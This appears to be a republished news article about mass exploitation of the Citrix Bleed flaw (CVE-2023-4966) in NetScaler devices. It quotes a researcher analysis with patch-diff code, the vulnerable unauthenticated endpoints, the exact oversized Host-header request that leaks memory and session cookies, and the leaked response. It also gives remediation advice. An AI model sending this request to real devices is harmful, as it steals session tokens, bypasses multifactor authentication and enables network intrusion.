{"id":54387,"date":"2023-10-31T12:55:03","date_gmt":"2023-10-31T12:55:03","guid":{"rendered":"https:\/\/packetstormsecurity.com\/news\/view\/35180\/Citrix-Bleed-Bug-Under-Mass-Exploitation.html"},"modified":"2023-10-31T12:55:03","modified_gmt":"2023-10-31T12:55:03","slug":"citrix-bleed-bug-under-mass-exploitation","status":"publish","type":"post","link":"https:\/\/www.threatshub.org\/blog\/citrix-bleed-bug-under-mass-exploitation\/","title":{"rendered":"Citrix Bleed Bug Under Mass Exploitation"},"content":{"rendered":"<figure class=\"intro-image intro-left\"> <img decoding=\"async\" src=\"https:\/\/cdn.arstechnica.net\/wp-content\/uploads\/2023\/05\/system-hacked-800x450.jpg\" alt=\"\u201cThis vulnerability is now under mass exploitation.\u201d Citrix Bleed bug bites hard\"><figcaption class=\"caption\">\n<div class=\"caption-credit\">Getty Images<\/div>\n<\/figcaption><\/figure>\n<aside id=\"social-left\" class=\"social-left\" aria-label=\"Read the comments or share this article\"> <a class=\"comment-count icon-comment-bubble-down\" href=\"https:\/\/arstechnica.com\/security\/2023\/10\/critical-citrix-bleed-vulnerability-allowing-mfa-bypass-comes-under-mass-exploitation\/?comments=1\"> <\/p>\n<h4 class=\"comment-count-before\">reader comments<\/h4>\n<p> <span class=\"comment-count-number\">21<\/span> <span class=\"visually-hidden\"> with <\/span> <\/a> <\/aside>\n<p> <!-- cache hit 333:single\/related:a7d1450ab0e8b4edb9e960ebe8cd9834 --><!-- empty --><\/p>\n<p>A vulnerability that allows attackers to bypass multifactor authentication and access enterprise networks using hardware sold by Citrix is under mass exploitation by ransomware hackers despite a patch being available for three weeks.<\/p>\n<p>Citrix Bleed, the common name for the vulnerability, carries a severity rating of 9.4 out of a possible 10, a relatively high designation for a mere information-disclosure bug. The reason: the information disclosed can include session tokens, which the hardware assigns to devices that have already successfully provided credentials, including those providing MFA. The vulnerability, tracked as CVE-2023-4966 and residing in Citrix\u2019s NetScaler Application Delivery Controller and NetScaler Gateway, has been under active exploitation <a href=\"https:\/\/arstechnica.com\/security\/2023\/10\/the-latest-high-severity-citrix-vulnerability-under-attack-isnt-easy-to-fix\/\">since August<\/a>. Citrix issued a patch on October 10.<\/p>\n<h2>Repeat: This is not a drill<\/h2>\n<p>Attacks have only ramped up recently, prompting security researcher Kevin Beaumont on Saturday to <a href=\"https:\/\/doublepulsar.com\/mass-exploitation-of-citrixbleed-vulnerability-including-a-ransomware-group-1405cbb9de18\">declare<\/a>: \u201cThis vulnerability is now under mass exploitation.\u201d He went on to say, \u201cFrom talking to multiple organizations, they are seeing widespread exploitation.\u201d<\/p>\n<p>He said that <a href=\"https:\/\/cyberplace.social\/@GossiTheDog\/111313594140810442\">as of Saturday<\/a>, he had found an estimated 20,000 instances of exploited Citrix devices where session tokens had been stolen. He said his estimate was based on running a honeypot of servers that masquerade as vulnerable Netscaler devices to track opportunistic attacks on the Internet. Beaumont then compared those results with other data, including some provided by <a href=\"https:\/\/en.wikipedia.org\/wiki\/NetFlow\">Netflow<\/a> and the Shodan search engine.<\/p>\n<p>Meanwhile, GreyNoise, a security company that also deploys honeypots, was showing exploits for CVE-2023-4966 coming from <a href=\"https:\/\/viz.greynoise.io\/query?gnql=tags%3A%22Citrix%20ADC%20Netscaler%20CVE-2023-4966%20Information%20Disclosure%20Attempt%22\">135 IP addresses<\/a> when this post went live on Ars. That\u2019s a 27-fold increase from the five IPs spotted GreyNoise saw five days ago.<\/p>\n<aside class=\"ad_wrapper\" aria-label=\"In Content advertisement\"> <span class=\"ad_notice\">Advertisement <\/span> <\/aside>\n<p>The most recent numbers available from security organization Shadowserver showed that there were <a href=\"https:\/\/dashboard.shadowserver.org\/statistics\/combined\/time-series\/?date_range=30&amp;source=http_vulnerable&amp;source=http_vulnerable6&amp;tag=cve-2023-4966%2B&amp;group_by=geo&amp;style=stacked\">roughly 5,500 unpatched devices<\/a>. Beaumont has acknowledged that the estimate is at odds with his estimate of 20,000 compromised devices. It\u2019s not immediately clear what was causing the discrepancy.<\/p>\n<p>The vulnerability is relatively easy for experienced people to exploit. A simple reverse-engineering of the patch Citrix released shows the functions that are vulnerable, and from there, it\u2019s not hard to write code that exploits them. Making attacks even easier, a handful of proof-of-concept exploits are available online.<\/p>\n<p>In a <a href=\"https:\/\/www.assetnote.io\/resources\/research\/citrix-bleed-leaking-session-tokens-with-cve-2023-4966\">detailed technical analysis<\/a>, researchers from Assetnote wrote:<\/p>\n<blockquote>\n<p>We found two functions that stood out <code>ns_aaa_oauth_send_openid_config<\/code> and <code>ns_aaa_oauthrp_send_openid_config<\/code>. Both functions perform a similar operation, they implement the OpenID Connect Discovery endpoint. The functions are both accessible unauthenticated via the <code>\/oauth\/idp\/.well-known\/openid-configuration<\/code> and <code>\/oauth\/rp\/.well-known\/openid-configuration<\/code> endpoints respectively.<\/p>\n<p>Both functions also included the same patch, an additional bounds check before sending the response. This can be seen in the snippets below showing the before and after for <code>ns_aaa_oauth_send_openid_config<\/code>.<\/p>\n<p><strong>Original<\/strong><\/p>\n<div class=\"w-embed\">\n<pre><code class=\"language-c\">iVar3 = snprintf(print_temp_rule,0x20000, \"{\\\"issuer\\\": \\\"https:\/\/%.*s\\\", \\\"authorization_endpoint\\\": \\\"https:\/\/%.*s\/oauth\/ idp\/login\\\", \\\"token_endpoint\\\": \\\"https:\/\/%.*s\/oauth\/idp\/token\\\", \\\"jwks_uri\\\": \\\"https:\/\/%.*s\/oauth\/idp\/certs\\\", \\\"response_types_supported\\\": [\\\"code\\\", \\\"toke n\\\", \\\"id_token\\\"], \\\"id_token_signing_alg_values_supported\\\": [\\\"RS256\\\"], \\\"end _session_endpoint\\\": \\\"https:\/\/%.*s\/oauth\/idp\/logout\\\", \\\"frontchannel_logout_sup ported\\\": true, \\\"scopes_supported\\\": [\\\"openid\\\", \\\"ctxs_cc\\\"], \\\"claims_support ed\\\": [\\\"sub\\\", \\\"iss\\\", \\\"aud\\\", \\\"exp\\\", \\\"iat\\\", \\\"auth_time\\\", \\\"acr\\\", \\\"amr \\\", \\\"email\\\", \\\"given_name\\\", \\\"family_name\\\", \\\"nickname\\\"], \\\"userinfo_endpoin t\\\": \\\"https:\/\/%.*s\/oauth\/idp\/userinfo\\\", \\\"subject_types_supported\\\": [\\\"public\\\"]}\" ,uVar5,pbVar8,uVar5,pbVar8,uVar5,pbVar8,uVar5,pbVar8,uVar5,pbVar8,uVar5,pbVar8);\nauthv2_json_resp = 1;\niVar3 = ns_vpn_send_response(param_1,0x100040,print_temp_rule,iVar3);\n<\/code><\/pre>\n<\/div>\n<p><strong>Patched<\/strong><\/p>\n<div class=\"w-embed\">\n<pre><code class=\"language-c\">uVar7 = snprintf(print_temp_rule,0x20000, \"{\\\"issuer\\\": \\\"https:\/\/%.*s\\\", \\\"authorization_endpoint\\\": \\\"https:\/\/%.*s\/oauth\/ idp\/login\\\", \\\"token_endpoint\\\": \\\"https:\/\/%.*s\/oauth\/idp\/token\\\", \\\"jwks_uri\\\": \\\"https:\/\/%.*s\/oauth\/idp\/certs\\\", \\\"response_types_supported\\\": [\\\"code\\\", \\\"toke n\\\", \\\"id_token\\\"], \\\"id_token_signing_alg_values_supported\\\": [\\\"RS256\\\"], \\\"end _session_endpoint\\\": \\\"https:\/\/%.*s\/oauth\/idp\/logout\\\", \\\"frontchannel_logout_sup ported\\\": true, \\\"scopes_supported\\\": [\\\"openid\\\", \\\"ctxs_cc\\\"], \\\"claims_support ed\\\": [\\\"sub\\\", \\\"iss\\\", \\\"aud\\\", \\\"exp\\\", \\\"iat\\\", \\\"auth_time\\\", \\\"acr\\\", \\\"amr \\\", \\\"email\\\", \\\"given_name\\\", \\\"family_name\\\", \\\"nickname\\\"], \\\"userinfo_endpoin t\\\": \\\"https:\/\/%.*s\/oauth\/idp\/userinfo\\\", \\\"subject_types_supported\\\": [\\\"public\\\"]}\" ,uVar5,pbVar8,uVar5,pbVar8,uVar5,pbVar8,uVar5,pbVar8,uVar5,pbVar8,uVar5,pbVar8);\nuVar4 = 0x20;\nif (uVar7 &lt; 0x20000) { authv2_json_resp = 1; iVar3 = ns_vpn_send_response(param_1,0x100040,print_temp_rule,uVar7); ...\n}\n<\/code><\/pre>\n<\/div>\n<p>The function is pretty simple, it generates a JSON payload for the OpenID configuration and uses <code>snprintf<\/code> to insert the device&#8217;s hostname at the appropriate locations in the payload. In the original version, the response is sent immediately. In the patched version, the response is only sent if <code>snprintf<\/code> returns a value less than <code>0x20000<\/code>.<\/p>\n<p>The vulnerability occurs because the return value of <code>snprintf<\/code> is used to determine how many bytes are sent to the client by <code>ns_vpn_send_response<\/code>. This is a problem because <code>snprintf<\/code> does not return how many bytes it <strong>did<\/strong> write to the buffer, <code>snprintf<\/code> returns how many bytes it <strong>would have<\/strong> written to the buffer if the buffer was big enough.<\/p>\n<p>To exploit this, all we needed to do was figure out how to get the response to exceed the buffer size of <code>0x20000<\/code> bytes. The application would then respond with the completely filled buffer, plus whatever memory immediately followed the <code>print_temp_rule<\/code> buffer.<\/p>\n<h3>\u200dExploiting the Endpoint<\/h3>\n<p>Initially we thought the endpoint would probably not be exploitable. The only data that was inserted was the hostname, which is something that needed administrator access to configure. Luckily for us, we were wrong and the value inserted into the payload did not come from the configured hostname. It actually came from the HTTP <code>Host<\/code> header.<\/p>\n<p>We were also fortunate that NetScaler inserts the hostname into the payload six times, as this meant we could hit the buffer limit of <code>0x20000<\/code> bytes without running into issues because either the <code>Host<\/code> header or the whole request was too long.<\/p>\n<p>We put together the following request and sent it to our NetScaler instance.<\/p>\n<div class=\"w-embed\">\n<pre><code class=\"language-http\">GET \/oauth\/idp\/.well-known\/openid-configuration HTTP\/1.1\nHost: a &lt;repeated 24812 times&gt;\nConnection: close\n<\/code><\/pre>\n<\/div>\n<p>We received the response shown below with the non-printable characters removed.<\/p>\n<div class=\"w-embed\">\n<pre><code class=\"language-http\">HTTP\/1.1 200 OK\nX-Content-Type-Options: nosniff\nX-XSS-Protection: 1; mode=block\nContent-Length: 147441\nCache-control: no-cache, no-store, must-revalidate\nPragma: no-cache\nContent-Type: application\/json; charset=utf-8\nX-Citrix-Application: Receiver for Web {\"issuer\": \"https:\/\/aaaaa ...&lt;omitted&gt;... aaaaaaaaaaaaaaaa\u00ed\u00a7\u00a1\n\u00f0\n\u00ed\u00a7\u00a1-\u00aa\u00bct\u00d9\u00cc\u00e5Dx013.1.48.47\u00e0\nd98cd79972b2637450836d4009793b100c3a01f2245525d5f4f58455e445a4a42HTTP\/1.1 200 OK\nContent-Length: @@@@@\nEncode:@@@\nCache-control: no-cache\nPragma: no-cache\nContent-Type: text\/html\nSet-Cookie: NSC_AAAC=@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@;Secure;HttpOnly;Path=\/ {\"categories\":[],\"resources\":[],\"subscriptionsEnabled\":false,\"username\":null}\n\u00f0\n\u00e5\n\u00e5\nP\u00cf\u00cf\nH\u00a1\n\u00e9\u00d2\u00cf\neG\u00c1\"RDEFAULT\n\u00f2 #pack200-gzip\ncompressdeflategzip\ndentity\n\u00fe\u00ff\u00ff\u00ff\u00ff\u00ff\n\u00a9VPN_GLOBAL\u00ff\u00ff\u00ff\u00ff\u00ff\u00ff \u00e8\"AAA_PARAM\u00ed\n<\/code><\/pre>\n<\/div>\n<p>We could clearly see a lot of leaked memory immediately following the JSON payload. While a lot of it was null bytes, there was some suspicious looking information in the response.<\/p>\n<\/blockquote>\n<aside class=\"ad_wrapper\" aria-label=\"In Content advertisement\"> <span class=\"ad_notice\">Advertisement <\/span> <\/aside>\n<p> The name Citrix Bleed is an allusion to Heartbleed, a different critical information disclosure vulnerability that <a href=\"https:\/\/arstechnica.com\/information-technology\/2014\/05\/four-weeks-on-huge-swaths-of-the-internet-remain-vulnerable-to-heartbleed\/\">turned the Internet on its head<\/a> in 2014. That vulnerability, which resided in the OpenSSL code library, came under mass exploitation and allowed the pilfering of passwords, encryption keys, banking credentials, and all kinds of other sensitive information. Citrix Bleed isn\u2019t as dire because there are fewer vulnerable devices in use.<\/p>\n<p>But Citrix Bleed is still plenty bad. Organizations should consider all Netscaler devices to have been compromised. This means patching any remaining unpatched devices. Then, all credentials should be rotated to ensure any session tokens that might have been leaked are invalidated. Last, organizations should inspect their devices and infrastructure for signs of compromise. Security firm Mandiant has in-depth security guidance <a href=\"https:\/\/services.google.com\/fh\/files\/misc\/citrix-netscaler-adc-gateway-cve-2023-4966-remediation.pdf\">here<\/a>.<\/p>\n<p> READ MORE <a href=\"https:\/\/packetstormsecurity.com\/news\/view\/35180\/Citrix-Bleed-Bug-Under-Mass-Exploitation.html\">HERE<\/a><\/p>\n","protected":false},"excerpt":{"rendered":"<p>READ MORE HERE&#8230;<\/p>\n","protected":false},"author":2,"featured_media":54388,"comment_status":"closed","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"colormag_page_layout":"default_layout","footnotes":""},"categories":[277],"tags":[145],"class_list":["post-54387","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-cybersecurity-blogs","tag-headlinehackerdata-lossflaw"],"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v27.8 - https:\/\/yoast.com\/product\/yoast-seo-wordpress\/ -->\n<title>Citrix Bleed Bug Under Mass Exploitation 2026 | ThreatsHub Cybersecurity News<\/title>\n<meta name=\"description\" content=\"ThreatsHub Cybersecurity News | ThreatsHub.org | Cloud Security &amp; Cyber Threats Analysis Hub. 100% Free OSINT Threat Intelligent and Cybersecurity News.\" \/>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/www.threatshub.org\/blog\/citrix-bleed-bug-under-mass-exploitation\/\" \/>\n<meta property=\"og:locale\" content=\"en_US\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"Citrix Bleed Bug Under Mass Exploitation 2026 | ThreatsHub Cybersecurity News\" \/>\n<meta property=\"og:description\" content=\"ThreatsHub Cybersecurity News | ThreatsHub.org | Cloud Security &amp; Cyber Threats Analysis Hub. 100% Free OSINT Threat Intelligent and Cybersecurity News.\" \/>\n<meta property=\"og:url\" content=\"https:\/\/www.threatshub.org\/blog\/citrix-bleed-bug-under-mass-exploitation\/\" \/>\n<meta property=\"og:site_name\" content=\"ThreatsHub Cybersecurity News\" \/>\n<meta property=\"article:published_time\" content=\"2023-10-31T12:55:03+00:00\" \/>\n<meta property=\"og:image\" content=\"https:\/\/cdn.arstechnica.net\/wp-content\/uploads\/2023\/05\/system-hacked-800x450.jpg\" \/>\n<meta name=\"author\" content=\"TH Author\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:creator\" content=\"@threatshub\" \/>\n<meta name=\"twitter:site\" content=\"@threatshub\" \/>\n<meta name=\"twitter:label1\" content=\"Written by\" \/>\n\t<meta name=\"twitter:data1\" content=\"TH Author\" \/>\n\t<meta name=\"twitter:label2\" content=\"Est. reading time\" \/>\n\t<meta name=\"twitter:data2\" content=\"6 minutes\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\\\/\\\/schema.org\",\"@graph\":[{\"@type\":\"Article\",\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/citrix-bleed-bug-under-mass-exploitation\\\/#article\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/citrix-bleed-bug-under-mass-exploitation\\\/\"},\"author\":{\"name\":\"TH Author\",\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/#\\\/schema\\\/person\\\/12e0a8671ff89a863584f193e7062476\"},\"headline\":\"Citrix Bleed Bug Under Mass Exploitation\",\"datePublished\":\"2023-10-31T12:55:03+00:00\",\"mainEntityOfPage\":{\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/citrix-bleed-bug-under-mass-exploitation\\\/\"},\"wordCount\":872,\"publisher\":{\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/#organization\"},\"image\":{\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/citrix-bleed-bug-under-mass-exploitation\\\/#primaryimage\"},\"thumbnailUrl\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/wp-content\\\/uploads\\\/2023\\\/10\\\/citrix-bleed-bug-under-mass-exploitation.jpg\",\"keywords\":[\"headline,hacker,data loss,flaw\"],\"articleSection\":[\"CyberSecurity Blogs\"],\"inLanguage\":\"en-US\"},{\"@type\":\"WebPage\",\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/citrix-bleed-bug-under-mass-exploitation\\\/\",\"url\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/citrix-bleed-bug-under-mass-exploitation\\\/\",\"name\":\"Citrix Bleed Bug Under Mass Exploitation 2026 | ThreatsHub Cybersecurity News\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/#website\"},\"primaryImageOfPage\":{\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/citrix-bleed-bug-under-mass-exploitation\\\/#primaryimage\"},\"image\":{\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/citrix-bleed-bug-under-mass-exploitation\\\/#primaryimage\"},\"thumbnailUrl\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/wp-content\\\/uploads\\\/2023\\\/10\\\/citrix-bleed-bug-under-mass-exploitation.jpg\",\"datePublished\":\"2023-10-31T12:55:03+00:00\",\"description\":\"ThreatsHub Cybersecurity News | ThreatsHub.org | Cloud Security & Cyber Threats Analysis Hub. 100% Free OSINT Threat Intelligent and Cybersecurity News.\",\"breadcrumb\":{\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/citrix-bleed-bug-under-mass-exploitation\\\/#breadcrumb\"},\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/citrix-bleed-bug-under-mass-exploitation\\\/\"]}]},{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/citrix-bleed-bug-under-mass-exploitation\\\/#primaryimage\",\"url\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/wp-content\\\/uploads\\\/2023\\\/10\\\/citrix-bleed-bug-under-mass-exploitation.jpg\",\"contentUrl\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/wp-content\\\/uploads\\\/2023\\\/10\\\/citrix-bleed-bug-under-mass-exploitation.jpg\",\"width\":800,\"height\":450},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/citrix-bleed-bug-under-mass-exploitation\\\/#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Home\",\"item\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"headline,hacker,data loss,flaw\",\"item\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/tag\\\/headlinehackerdata-lossflaw\\\/\"},{\"@type\":\"ListItem\",\"position\":3,\"name\":\"Citrix Bleed Bug Under Mass Exploitation\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/#website\",\"url\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/\",\"name\":\"ThreatsHub Cybersecurity News\",\"description\":\"%%focuskw%% Threat Intel \u2013 Threat Intel Services \u2013 CyberIntelligence \u2013 Cyber Threat Intelligence - Threat Intelligence Feeds - Threat Intelligence Reports - CyberSecurity Report \u2013 Cyber Security PDF \u2013 Cybersecurity Trends - Cloud Sandbox \u2013- Threat IntelligencePortal \u2013 Incident Response \u2013 Threat Hunting \u2013 IOC - Yara - Security Operations Center \u2013 SecurityOperation Center \u2013 Security SOC \u2013 SOC Services - Advanced Threat - Threat Detection - TargetedAttack \u2013 APT \u2013 Anti-APT \u2013 Advanced Protection \u2013 Cyber Security Services \u2013 Cybersecurity Services -Threat Intelligence Platform\",\"publisher\":{\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/#organization\"},\"alternateName\":\"Threatshub.org\",\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"en-US\"},{\"@type\":\"Organization\",\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/#organization\",\"name\":\"ThreatsHub.org\",\"alternateName\":\"Threatshub.org\",\"url\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/\",\"logo\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/#\\\/schema\\\/logo\\\/image\\\/\",\"url\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/wp-content\\\/uploads\\\/2025\\\/05\\\/Threatshub_Favicon1.jpg\",\"contentUrl\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/wp-content\\\/uploads\\\/2025\\\/05\\\/Threatshub_Favicon1.jpg\",\"width\":432,\"height\":435,\"caption\":\"ThreatsHub.org\"},\"image\":{\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/#\\\/schema\\\/logo\\\/image\\\/\"},\"sameAs\":[\"https:\\\/\\\/x.com\\\/threatshub\"]},{\"@type\":\"Person\",\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/#\\\/schema\\\/person\\\/12e0a8671ff89a863584f193e7062476\",\"name\":\"TH Author\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/066276f086d5155df79c850206a779ad368418a844da0182ce43f9cd5b506c3d?s=96&d=mm&r=g\",\"url\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/066276f086d5155df79c850206a779ad368418a844da0182ce43f9cd5b506c3d?s=96&d=mm&r=g\",\"contentUrl\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/066276f086d5155df79c850206a779ad368418a844da0182ce43f9cd5b506c3d?s=96&d=mm&r=g\",\"caption\":\"TH Author\"}}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"Citrix Bleed Bug Under Mass Exploitation 2026 | ThreatsHub Cybersecurity News","description":"ThreatsHub Cybersecurity News | ThreatsHub.org | Cloud Security & Cyber Threats Analysis Hub. 100% Free OSINT Threat Intelligent and Cybersecurity News.","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/www.threatshub.org\/blog\/citrix-bleed-bug-under-mass-exploitation\/","og_locale":"en_US","og_type":"article","og_title":"Citrix Bleed Bug Under Mass Exploitation 2026 | ThreatsHub Cybersecurity News","og_description":"ThreatsHub Cybersecurity News | ThreatsHub.org | Cloud Security & Cyber Threats Analysis Hub. 100% Free OSINT Threat Intelligent and Cybersecurity News.","og_url":"https:\/\/www.threatshub.org\/blog\/citrix-bleed-bug-under-mass-exploitation\/","og_site_name":"ThreatsHub Cybersecurity News","article_published_time":"2023-10-31T12:55:03+00:00","og_image":[{"url":"https:\/\/cdn.arstechnica.net\/wp-content\/uploads\/2023\/05\/system-hacked-800x450.jpg","type":"","width":"","height":""}],"author":"TH Author","twitter_card":"summary_large_image","twitter_creator":"@threatshub","twitter_site":"@threatshub","twitter_misc":{"Written by":"TH Author","Est. reading time":"6 minutes"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"Article","@id":"https:\/\/www.threatshub.org\/blog\/citrix-bleed-bug-under-mass-exploitation\/#article","isPartOf":{"@id":"https:\/\/www.threatshub.org\/blog\/citrix-bleed-bug-under-mass-exploitation\/"},"author":{"name":"TH Author","@id":"https:\/\/www.threatshub.org\/blog\/#\/schema\/person\/12e0a8671ff89a863584f193e7062476"},"headline":"Citrix Bleed Bug Under Mass Exploitation","datePublished":"2023-10-31T12:55:03+00:00","mainEntityOfPage":{"@id":"https:\/\/www.threatshub.org\/blog\/citrix-bleed-bug-under-mass-exploitation\/"},"wordCount":872,"publisher":{"@id":"https:\/\/www.threatshub.org\/blog\/#organization"},"image":{"@id":"https:\/\/www.threatshub.org\/blog\/citrix-bleed-bug-under-mass-exploitation\/#primaryimage"},"thumbnailUrl":"https:\/\/www.threatshub.org\/blog\/coredata\/uploads\/2023\/10\/citrix-bleed-bug-under-mass-exploitation.jpg","keywords":["headline,hacker,data loss,flaw"],"articleSection":["CyberSecurity Blogs"],"inLanguage":"en-US"},{"@type":"WebPage","@id":"https:\/\/www.threatshub.org\/blog\/citrix-bleed-bug-under-mass-exploitation\/","url":"https:\/\/www.threatshub.org\/blog\/citrix-bleed-bug-under-mass-exploitation\/","name":"Citrix Bleed Bug Under Mass Exploitation 2026 | ThreatsHub Cybersecurity News","isPartOf":{"@id":"https:\/\/www.threatshub.org\/blog\/#website"},"primaryImageOfPage":{"@id":"https:\/\/www.threatshub.org\/blog\/citrix-bleed-bug-under-mass-exploitation\/#primaryimage"},"image":{"@id":"https:\/\/www.threatshub.org\/blog\/citrix-bleed-bug-under-mass-exploitation\/#primaryimage"},"thumbnailUrl":"https:\/\/www.threatshub.org\/blog\/coredata\/uploads\/2023\/10\/citrix-bleed-bug-under-mass-exploitation.jpg","datePublished":"2023-10-31T12:55:03+00:00","description":"ThreatsHub Cybersecurity News | ThreatsHub.org | Cloud Security & Cyber Threats Analysis Hub. 100% Free OSINT Threat Intelligent and Cybersecurity News.","breadcrumb":{"@id":"https:\/\/www.threatshub.org\/blog\/citrix-bleed-bug-under-mass-exploitation\/#breadcrumb"},"inLanguage":"en-US","potentialAction":[{"@type":"ReadAction","target":["https:\/\/www.threatshub.org\/blog\/citrix-bleed-bug-under-mass-exploitation\/"]}]},{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/www.threatshub.org\/blog\/citrix-bleed-bug-under-mass-exploitation\/#primaryimage","url":"https:\/\/www.threatshub.org\/blog\/coredata\/uploads\/2023\/10\/citrix-bleed-bug-under-mass-exploitation.jpg","contentUrl":"https:\/\/www.threatshub.org\/blog\/coredata\/uploads\/2023\/10\/citrix-bleed-bug-under-mass-exploitation.jpg","width":800,"height":450},{"@type":"BreadcrumbList","@id":"https:\/\/www.threatshub.org\/blog\/citrix-bleed-bug-under-mass-exploitation\/#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Home","item":"https:\/\/www.threatshub.org\/blog\/"},{"@type":"ListItem","position":2,"name":"headline,hacker,data loss,flaw","item":"https:\/\/www.threatshub.org\/blog\/tag\/headlinehackerdata-lossflaw\/"},{"@type":"ListItem","position":3,"name":"Citrix Bleed Bug Under Mass Exploitation"}]},{"@type":"WebSite","@id":"https:\/\/www.threatshub.org\/blog\/#website","url":"https:\/\/www.threatshub.org\/blog\/","name":"ThreatsHub Cybersecurity News","description":"%%focuskw%% Threat Intel \u2013 Threat Intel Services \u2013 CyberIntelligence \u2013 Cyber Threat Intelligence - Threat Intelligence Feeds - Threat Intelligence Reports - CyberSecurity Report \u2013 Cyber Security PDF \u2013 Cybersecurity Trends - Cloud Sandbox \u2013- Threat IntelligencePortal \u2013 Incident Response \u2013 Threat Hunting \u2013 IOC - Yara - Security Operations Center \u2013 SecurityOperation Center \u2013 Security SOC \u2013 SOC Services - Advanced Threat - Threat Detection - TargetedAttack \u2013 APT \u2013 Anti-APT \u2013 Advanced Protection \u2013 Cyber Security Services \u2013 Cybersecurity Services -Threat Intelligence Platform","publisher":{"@id":"https:\/\/www.threatshub.org\/blog\/#organization"},"alternateName":"Threatshub.org","potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/www.threatshub.org\/blog\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"en-US"},{"@type":"Organization","@id":"https:\/\/www.threatshub.org\/blog\/#organization","name":"ThreatsHub.org","alternateName":"Threatshub.org","url":"https:\/\/www.threatshub.org\/blog\/","logo":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/www.threatshub.org\/blog\/#\/schema\/logo\/image\/","url":"https:\/\/www.threatshub.org\/blog\/coredata\/uploads\/2025\/05\/Threatshub_Favicon1.jpg","contentUrl":"https:\/\/www.threatshub.org\/blog\/coredata\/uploads\/2025\/05\/Threatshub_Favicon1.jpg","width":432,"height":435,"caption":"ThreatsHub.org"},"image":{"@id":"https:\/\/www.threatshub.org\/blog\/#\/schema\/logo\/image\/"},"sameAs":["https:\/\/x.com\/threatshub"]},{"@type":"Person","@id":"https:\/\/www.threatshub.org\/blog\/#\/schema\/person\/12e0a8671ff89a863584f193e7062476","name":"TH 